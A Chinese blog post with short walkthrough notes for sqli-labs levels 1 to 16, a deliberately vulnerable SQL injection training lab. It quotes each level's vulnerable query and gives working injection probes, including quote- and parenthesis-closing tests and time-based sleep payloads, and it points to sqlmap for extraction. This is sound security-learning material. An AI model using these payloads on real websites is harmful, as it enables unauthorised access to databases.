小记sqli-labs 1-16关

最新推荐文章于 2024-05-06 18:59:53 发布
最新推荐文章于 2024-05-06 18:59:53 发布
阅读量292 收藏
点赞数
文章标签: java servlet 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58358185/article/details/127831907
版权

less-1 字符型

通过

1‘ and 1=1 --+

1‘ and 1=2 --+ 即可判断出来

less2- 数字型

通过

1 and 1=1

1 and 1=2 即可判断出来

less-3-观察源码

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

只需要闭合小括号即可

payload:

?id=1') and 1=1 --+

?id=1') and 1=2 --+  得到注入点

less-4

观察源码

$id = '"' . $id . '"';

$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

发现需要闭合双引号和小括号

?id=1") and 1=1 --+

?id=1") and 1=2 --+

less-5

尝试 ?id=1' and 1=1 --+ 发现页面并没有回显数据,

     而使用?id=1' and 1=2 --+ 发现页面缺少东西了,所以判断此处存在注入点,但是由于没有数据,所以只能使用盲注

既然判断出注入类型即可使用工具,或者写个脚本进行注入了

我使用的是sqlmap

扫出存在布尔盲注、报错注入、时间盲注漏洞

less-6

观察源码

$id = '"'.$id.'"';

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

发现其对接收的数据进行加 "" 的处理,所以我们在构造payload的的时候需要对"进行闭合

判断是否存在注入的payload

?id=1" and 1=1 --+ 页面显示正常

?id=1" and 1=2 --+ 页面显示错误

因为没有回显数据,所以还是用工具

 

less-7

观察源码

$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";

发现可以i使用”))进行闭合

-p 指定参数进行注入

 id=1')) AND 1=1 --+ 页面显示正常

 id=1'))AND 1=2 --+ 页面显示异常

但是没有回显数据,接着使用工具

less-8

观察源码

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

判断注入点

?id=1' and 1=1--+

?id=1' and 1=2--+

存在盲注

 

less-9

在这关,无法使用上面的 and 1=1这种方法进行判断了,因为页面无论正常还是有错误都没有进行回显,所以只能使用时间盲注的方式进行判断。

判断注入点的payload为

?id=1' and if(length(database())>0,sleep(5),sleep(1)) --+

上述sql语句的意思是,如果数据库名长度大于0,那么等待5 seconds,如果不大于0则等待1s

这样就可以判断是否存在注入点了

因为盲注比较麻烦所以还是使用sqlmap进行

 

less-10

查看源码

$id = '"'.$id.'"';

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

发现后端程序对接收的参数进行加 "" 处理,所以只要闭合这个双引号即可

并且与上一关一样,此处无论对错都没有回显,所以还是选用sleep判断注入点

payload:

?id=1" and if(length(database())>0,sleep(5),sleep(1)) --+

这边手工检测出存在注入点,但是sqlmap默认检测却检测不到,所以需要 --level 参数手动指定扫描级别,我这边level=2就可以扫描出来了

sqlmap命令

跑完发现存在注入

 

less-11

查看源码

$id = '"'.$id.'"';

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

发现传参方式POST,所以此时就得使用Burpsuite抓包了

在不看源码的情况下直接抓包也可以判断传参方式

payload:

admin' and 1=1--+页面回显数据

admin' and 1=2--+页面无回显数据

使用sqlmap进行扫描需要加--data ”POST请求的内容“ 进行使用

 

less-12

查看源码

 $uname='"'.$uname.'"';

 $passwd='"'.$passwd.'"';

@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";

发现只需闭合小括号和双引号即可

所以payload应该是

uname=admin") AND 6149=6149# 页面显示数据

uname=admin") AND 6148=6149# 页面无显示

 

less-13

与前面的一样都是对接收的参数进行处理,只是传参的方式是POST

可以直接在页面的输入框中测试payload即可判断注入点

less-14 - less16与前面相似,只不过闭合的方式不同而已,闭合方式参考less 3-10 的即可,我们这边直接跳过

Wolven_Security
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
首先,我们需要下载 sqli-labs 源码,链接为 https://github.com/Audi-1/sqli-labs。然后,我们将源码解压到 web 目录下,在这里是 www 目录下。 数据库配置 接下来,我们需要配置数据库连接。在这里,我们需要...
在CentOS7中搭建sqli-labs环境以及使用sqlmap对其进行sql注入
m0_53499553的博客
04-04 6836
目录 安装docker 使用docker拉取sqli-labs的镜像 对我们使用到的sqlmap的参数解释 使用Kali中自带的sqlmap进行sql注入 安装docker 因为我们是使用docker去搭建sqli-labs,所以在CentOS7中搭建sqli-labs环境之前需要先安装docker(如果安装过,可以直接去执行安装完docker的后续步骤) 安装需要的软件包,yum-util 提供yum-config-manager实用程序,另外两个是devicemapper驱动依赖的,需要.
SQL注入】sqli-labs手注+sqlmap
m0_63563528的博客
07-19 2124
第一周:SQL注入学习
2024年网络安全-sqlmap实战之sqlilabs-Less5_sqlmap打less5,网络安全基础学习教程
最新发布
2401_84253089的博客
05-06 840
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
sqli-labs之sqlmap初体验
rev1ve的博客
08-07 571
为了更深入学习sqlmap,打算对sqli-labs进行SQL注入测试学习内容包括不同的请求方式和请求参数,总之写下这篇博客记录我的学习过程。
salmap通sql-labs学习笔记
qq_43641876的博客
11-19 583
sql注入学习笔记输出1
sql_labs通,手动加sqlmap
qq_47289634的博客
02-23 739
信息收集: 数据库版本:version()数据库名字:database() 数据库用户:user() 系统:@@version_compile_os MySQL5.0以上版本自带一个information_schema数据库,储存所有的数据库名表名列名 数据库中 . (点)代表下一级 student.users 代表student数据库中的users表看我另外一篇,点击下方蓝色字体sqlmap详细使用方法id=1,id=2返回类内容不同,输入的内容是带入到数据库里面查询了。 判断类型:这里我把源代码输出了
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
Sqli靶场 11--->22Less
huohaowen的博客
01-29 1602
又是打靶场的一天(靶场球球你别打我)
sqli-labs第1
weixin_45626840的博客
04-23 205
草草写的一篇记录文章 概念 SQL注入就是将恶意代码拼接到业务正常的数据库查询,造成数据库信息泄露等危害。 我觉得 要弄懂SQL注入,需要一点计网的知识,最好知道Web开发的整个流程,中间用了哪些技术,为什么需要这种技术。当然,你首先得懂得数据库以及SQL查询,并且程序设计语言和SQL语言之间的结合(推荐一本书《数据库系统概论》)。有了这些基础,SQL注入就自然而然会懂的。 通思路 输入id,登录正常 尝试闭合语句 单引号报错,推测后端查询语句为: select * from table where
sqli-lab 1-16随笔记
m0_52361291的博客
06-08 293
前段时间大概学了一遍内网,免杀正好来将web这块重新复习一遍 由于是直接刷所以只是让卡报出注入点其余的都没搞。首先明确SQL注入产生的原理是传递结构化语言时影响了数据库的执行叫做SQL注入。这些卡都是统一的get型注入而且都是通过联合查询的 代码中通过mysql_query()和mysql_fetch_array()这两个函数先执行查询语句然后再将同一行的数据以数组形式输出,调用数据库列名称来呈现查询结果而mysql_error()这个函数的作用是输出mysql数据库报错的信息这也是做联合查询时的一个
Sqli-labs靶场第16详解[Sqli-labs-less-16]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 630
-batch当你需要以批处理模式运行 sqlmap,避免任何用户干预 sqlmap 的运行,可以强制使用--batch这个开。这样,当 sqlmap 需要用户输入信息时,都将会以默认参数运行。由于这题是,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件爆出当前主机名称。
Sql-labs 前 20 通过笔记
weixin_45619494的博客
10-06 441
输入:passwd=admin' and updatexml(1,concat(0x5e,(substr((select database()),1)),0x5e),1) --+直接用 十八 payload:3',extractvalue(1,concat(0x7e,(select database()),0x7e))) #发现 用 passwd=admin' sleep(6) --+ ,没有延迟,时间盲注可能没用。修改 0x5e 之前 的数字 为 32,63,94,125,即可获得后续内容!
sqlmap)【sqli-labs靶场1-4】GET请求、错误注入、单引号、双引号、括号闭合、字符型、整型
05-26 973
sqllabs靶场】sqlmap
sqli-labs第二十一详解(这次用sqlmap)
金 帛的博客
05-09 2660
SQL靶场第二十一答案详解,这次用sqlmap跑
Sqli-Labs Less1-16详细讲解
大大大蜜蜂的博客
10-21 3493
information_schema数据库介绍: information_schema数据库是MySQL自带的,它提供了访问数据库元数据的方式。元数据是于数据的数据,如数据库名或表名,列的数据类型,或访问权限等。information_schema是信息数据库,其中保存着于mysql服务器所维护的所有其他数据库的信息。 下列为information_schema数据库中schemata表、tables表、columns表的介绍。 schemata表:提供了当前mysql实例中所有数据库的信息。 sche

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值